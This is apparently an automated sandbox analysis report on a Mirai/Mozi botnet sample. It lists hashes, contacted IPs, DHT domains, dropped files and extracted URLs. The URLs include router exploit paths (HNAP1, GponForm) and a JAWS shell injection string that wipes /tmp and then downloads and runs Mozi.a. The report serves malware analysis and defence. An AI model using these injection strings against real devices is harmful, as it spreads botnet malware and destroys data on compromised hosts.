We are hiring! Windows Kernel Developer (Remote), apply here!
flash

rIbyGX66Op

Status: finished
Submission Time: 2021-04-25 21:12:06 +02:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    397469
  • API (Web) ID:
    697096
  • Analysis Started:
    2021-04-25 21:12:42 +02:00
  • Analysis Finished:
    2021-04-25 21:23:27 +02:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

malicious
100/100

malicious
41/60

malicious
20/37

malicious
20/29

malicious

IPs

IP Country Detection
138.94.203.237
Brazil
84.234.82.133
Denmark
120.72.175.96
China
Click to see the 97 hidden entries
199.247.32.171
United States
17.103.205.243
United States
175.12.222.235
China
91.244.32.53
Ukraine
68.87.138.12
United States
161.141.143.253
Canada
32.69.172.174
United States
200.161.213.126
Brazil
163.112.176.81
France
86.18.93.173
United Kingdom
64.48.220.97
United States
19.21.98.61
United States
32.26.172.252
United States
18.198.126.226
United States
113.81.33.205
China
166.231.171.29
United States
87.178.42.105
Germany
120.123.201.216
Taiwan; Republic of China (ROC)
162.159.107.38
United States
208.150.231.33
United States
104.222.233.43
United States
194.207.227.221
United Kingdom
117.177.0.80
China
222.121.68.4
Korea Republic of
175.158.80.139
India
197.35.48.236
Egypt
159.196.101.170
Australia
180.77.237.198
China
145.152.174.114
Netherlands
60.234.236.97
New Zealand
128.188.21.157
United States
155.228.130.68
Switzerland
201.195.173.239
Costa Rica
121.192.9.176
China
35.224.66.235
United States
185.189.120.185
Iran (ISLAMIC Republic Of)
202.146.185.28
unknown
119.100.162.203
China
94.117.20.210
United Kingdom
35.121.101.202
United States
79.73.229.27
United Kingdom
115.24.120.43
China
53.181.254.20
Germany
4.214.87.116
United States
167.13.97.181
United States
107.112.161.192
United States
134.106.59.104
Germany
175.111.30.198
Korea Republic of
136.26.47.177
United States
166.201.228.49
United States
102.44.180.253
Egypt
35.37.134.166
United States
14.239.14.115
Viet Nam
46.14.87.211
Switzerland
196.164.176.188
South Africa
39.241.4.19
Indonesia
172.143.86.137
United States
86.170.164.103
United Kingdom
119.215.90.101
Korea Republic of
96.100.50.191
United States
178.82.160.65
Switzerland
39.187.20.227
China
72.163.148.240
United States
97.71.87.134
United States
13.162.43.135
United States
5.71.245.186
United Kingdom
64.134.176.11
United States
220.236.199.32
Australia
118.208.32.220
Australia
40.244.52.155
United States
27.197.73.200
China
96.85.17.58
United States
77.187.60.235
Germany
203.49.228.158
Australia
197.67.5.164
South Africa
221.97.226.130
Japan
118.191.184.146
China
185.149.161.32
Russian Federation
128.101.242.184
United States
95.82.71.140
Kazakhstan
108.204.197.113
United States
68.129.151.18
United States
2.164.195.43
Germany
53.117.221.59
Germany
221.68.20.5
Japan
195.157.0.194
United Kingdom
133.82.183.72
Japan
157.159.2.178
France
79.116.36.122
Romania
181.113.148.196
Ecuador
187.213.209.8
Mexico
182.9.38.118
Indonesia
217.131.3.242
Turkey
5.232.235.2
Iran (ISLAMIC Republic Of)
124.12.205.156
Taiwan; Republic of China (ROC)
11.89.47.10
United States
37.211.3.99
Qatar

Domains

Name IP Detection
dht.transmissionbt.com
212.129.33.59
bttracker.acc.umu.se
130.239.18.159
router.bittorrent.com
67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com
82.221.103.244
bttracker.debian.org
0.0.0.0

URLs

Name Detection
http://%s:%d/bin.sh;chmod
http://220.130.214.100:80/HNAP1/
http://%s:%d/bin.sh
Click to see the 35 hidden entries
http://121.5.104.125:80/HNAP1/
http://3.11.29.16:80/HNAP1/
http://69.195.90.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.72.178.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://95.217.3.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://%s:%d/Mozi.a;sh$
http://HTTP/1.1
http://www.alsa-project.org.
http://www.pastebin.ca.
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh
http://purenetworks.com/HNAP1/
http://34.90.159.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.pastebin.ca
http://pastebin.ca)
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://164.125.103.242:80/HNAP1/
http://ipinfo.io/ip
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://127.0.0.1sendcmd
http://www.alsa-project.org/cardinfo-db/
http://%s:%d/Mozi.m
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://schemas.xmlsoap.org/soap/envelope/
http://%s:%d/Mozi.m;$
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d/Mozi.a;chmod

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountall.sh
ASCII text
#
/usr/bin/gettext.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/rc.local
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/init.d/umountnfs.sh
ASCII text
#
/etc/init.d/mountnfs.sh
ASCII text
#
/etc/init.d/mountnfs-bootclean.sh
ASCII text
#
/etc/init.d/mountkernfs.sh
ASCII text
#
/etc/init.d/mountdevsubfs.sh
ASCII text
#
/etc/init.d/mountall-bootclean.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/hostname.sh
ASCII text
#
/etc/init.d/checkroot.sh
ASCII text
#
/etc/init.d/checkroot-bootclean.sh
ASCII text
#
/etc/init.d/checkfs.sh
ASCII text
#
/etc/init.d/bootmisc.sh
ASCII text
#
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/tmp/.config
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/etc/bash_completion.d/libreoffice.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/powerbtn.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/boot/grub/i386-pc/modinfo.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#